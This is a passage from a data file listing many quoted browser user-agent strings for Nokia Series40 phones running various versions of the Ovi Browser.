(Series40; Nokia202/20.52; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia206/04.52; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.7.0.0.11", "Mozilla/5.0 (Series40; Nokia305/05.92; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia112/03.26; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia114/03.47; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia305/07.42; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; NokiaX3-02.5/06.75; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia305/03.60; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia200/10.58; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia206/04.52; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia200/11.56; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia311/07.36; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia200/11.81; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Series40; NokiaC2-06/07.63; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia309/05.85; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia305/05.92; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.2.0.0.6", "Mozilla/5.0 (Series40; Nokia202/20.36; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; NokiaX2-02/11.84; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; NokiaC2-06/07.57; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Series40; NokiaC2-06/07.48; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia200/11.56; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia206/03.58; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.1.0.1", "Mozilla/5.0 (Series40; Nokia210/04.12; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia206/03.59; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.2.0.0.36", "Mozilla/5.0 (Series40; NokiaC2-02/06.96; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia200/11.64; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia308/05.85; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.7.0.0.11", "Mozilla/5.0 (Series40; Nokia311/05.92; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.1.0.1", "Mozilla/5.0 (Series40; Nokia302/14.92; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.1.0.1", "Mozilla/5.0 (Series40; Nokia306/03.63; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia111/03.32; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; NokiaC2-06/07.63; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia301/09.04; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia200/11.95; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.3.0.0.49", "Mozilla/5.0 (Series40; NokiaC2-03/06.96; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia200/11.95; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.2.0.0.36", "Mozilla/5.0 (Series40; Nokia200/10.60; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia206/03.60; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia205.1/03.18; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia111/03.32; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Series40; NokiaC2-03/07.29; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Series40; Nokia114/03.47; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; NokiaAsha230DualSIM/14.0.4/java_runtime_version=Nokia_Asha_1_2; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.30", "Mozilla/5.0 (Series40; Nokia208.4/04.06; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia200/12.04; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia203/20.52; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia114/03.33; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia308/08.13; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; NokiaX3-02/le6.32; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.0.2.62.10", "Mozilla/5.0 (Series40; Nokia210/06.09; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia206/03.59; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia208/03.39; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia206/04.51; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia200/11.95; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia311/05.92; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; NokiaC2-06/07.63; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia302/14.78; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; NokiaC2-03/07.65; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Series40; Nokia200/11.56; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; NokiaC2-03/07.48a; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia205/04.51; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; NokiaC2-00/03.99; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia202/20.28; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia309/08.22; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; NokiaC2-06/07.29; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia5130c-2/07.97; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia112/03.32; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; NokiaC2-03/07.48; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.3.0.0.49", "Mozilla/5.0 (Series40; Nokia203/20.52; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia308/07.55; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia114/03.33; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia301.1/08.02; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia200/11.81; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.0.2.68.14", "Mozilla/5.0 (Series40; Nokia206/03.59; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.3.0.0.49", "Mozilla/5.0 (Series40; Nokia200/10.60; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia200/11.81; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia2051/03.20; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia206/03.58; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.2.0.0.36", "Mozilla/5.0 (Series40; Nokia2055/03.20; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia515.2/05.08; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.3.0.0.55", "Mozilla/5.0 (Series40; NokiaX2-02/11.84; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia200/11.64; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia305/03.60; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia203/20.26; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia311/07.36; Profile/MIDP-1.2 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia306/07.42; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia305/05.92; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia114/03.47; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.3.0.0.48", "Mozilla/5.0 (Series40; Nokia305/07.42; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia210/06.09; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia210/04.12; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia206/04.52; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia206/03.59; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia305/03.60; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia302/14.26; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; NokiaC2-03/06.96; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.3.0.0.49", "Mozilla/5.0 (Series40; Nokia206/03.58; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia206/03.59; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia2730c-1/10.47; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia305/03.60; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Series40; Nokia112/03.48; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia203/20.26; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.3.0.0.49", "Mozilla/5.0 (Series40; NokiaC1-01/06.15; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia112/03.48; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia301/09.04; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia208.1/04.06; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia302/14.26; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia210/04.12; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia2730c-1/10.47; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.3.0.0.49", "Mozilla/5.0 (Series40; Nokia306/07.42; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia200/10.58; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia200/11.95; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.7.0.0.11", "Mozilla/5.0 (Series40; Nokia308/08.13; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.3.0.0.54", "Mozilla/5.0 (Series40; Nokia208/03.39; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia202/20.36; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia200/10.58; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.3.0.0.49", "Mozilla/5.0 (Series40; Nokia208/ddECL3G_13w22; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.3.0.0.55", "Mozilla/5.0 (Series40; Nokia205/03.18; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia200/11.56; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.0.2.68.14", "Mozilla/5.0 (Series40; NokiaC2-03/07.29; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia112/03.32; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; NokiaC2-03/07.65; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia114/03.51; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia200/12.04; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; NokiaX2-02/11.57; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia112/03.28; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia502/14.0.4/java_runtime_version=Nokia_Asha_1_2; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.20", "Mozilla/5.0 (Series40; Nokia311/05.92; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.3.0.0.49", "Mozilla/5.0 (Series40; Nokia305/05.92; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.1.0.0.62", "Mozilla/5.0 (Series40; Nokia200/10.61; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; NokiaX3-02/le6.32; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/1.0.0.11.8", "Mozilla/5.0 (Series40; Nokia112/03.51; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia200/11.95; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Series40; Nokia302/14.92; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; NokiaX2-02/11.79; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia203/20.36; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; NokiaX2-02/11.79; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Series40; Nokia502/14.0.5/java_runtime_version=Nokia_Asha_1_2; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.20", "Mozilla/5.0 (Series40; Nokia2055/03.20; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; NokiaX2-01/08.70; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.7.0.0.11", "Mozilla/5.0 (Series40; NokiaC2-03/06.96; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Series40; Nokia311/03.81; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia306/07.42; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia301/02.33; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia302/14.78; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.0.2.68.9", "Mozilla/5.0 (Series40; NokiaC2-03/07.63; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.7.0.0.11", "Mozilla/32.0.3 (Series40; Nokia305/07.42; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia200/11.56; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Series40; Nokia302/14.53; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia203/20.36; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.0.1.62.6", "Mozilla/5.0 (Series40; Nokia308/05.80; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia202/20.52; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia515.2/05.08; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia210.2/06.09; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; NokiaX2-00/04.80; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Series40; NokiaAsha230DualSIM/14.0.5/java_runtime_version=Nokia_Asha_1_2; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.20", "Mozilla/5.0 (Series40; NokiaC2-03/07.48; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia305/07.42; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia203/20.52; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.1.0.1", "Mozilla/5.0 (Series40; Nokia205/03.19; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia208.4/06.01; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia205/03.19; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.1.0.1", "Mozilla/5.0 (Series40; Nokia515.2/10.34; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.3.0.0.49", "Mozilla/5.0 (Series40; Nokia305/03.60; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.7.0.0.11", "Mozilla/5.0 (Series40; Nokia200/11.64; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Series40; Nokia6300/07.30; Profile/MIDP-2.0 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.0.2.68.14", "Mozilla/5.0 (Series40; Nokia200/10.61; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.1.0.1", "Mozilla/5.0 (Series40; NokiaC1-01/06.15; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia205/04.51; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia205/03.19; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.2.0.0.34", "Mozilla/5.0 (Series40; Nokia200/11.81; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia6300/07.30; Profile/MIDP-2.0 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia208/03.39; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.3.0.0.55", "Mozilla/5.0 (Series40; Nokia200/11.64; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.2.0.0.36", "Mozilla/5.0 (Series40; Nokia201/11.81; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia205/03.18; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.2.0.0.34", "Mozilla/5.0 (Series40; Nokia208/09.05; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; NokiaX2-02/10.90; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/1.0.2.26.11", "Mozilla/5.0 (Series40; Nokia205.1/04.51; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia200/11.95; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.0.1.62.6", "Mozilla/5.0 (Series40; NokiaX2-02/12.04; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; NokiaX2-02/11.84; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.0.1.62.6", 